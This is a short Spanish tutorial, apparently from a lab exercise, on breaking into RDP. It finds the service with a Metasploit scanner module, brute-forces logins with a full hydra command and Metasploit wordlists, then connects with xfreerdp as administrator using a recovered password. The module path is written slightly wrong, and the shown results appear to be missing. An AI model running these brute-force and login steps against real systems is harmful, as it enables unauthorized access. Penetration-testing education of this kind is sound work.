Hackear RDP
Por lo general, el protocolo RDP corre sobre el puerto 3389, pero es posible que corra por otro puerto, por lo que podemos asegurarnos de que un puerto es el RDP con metasploit:
Usaremos el siguiente módulo de metasploit:
use auxiliary_scanner/rdp/rdp_scanner
Y ahora con hydra podemos hacer el ataque de fuerza bruta con estos parámetros:
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.2.28.92 -s 3333
Y nos encuentra los siguientes usuarios:
Ahora para conectarnos de forma remota, podemos usar una herramienta llamada xfreerdp:
xfreerdp /u:administrator /p:qwertyuiop /v:10.2.28.92:3333
Y ya habremos entrado:




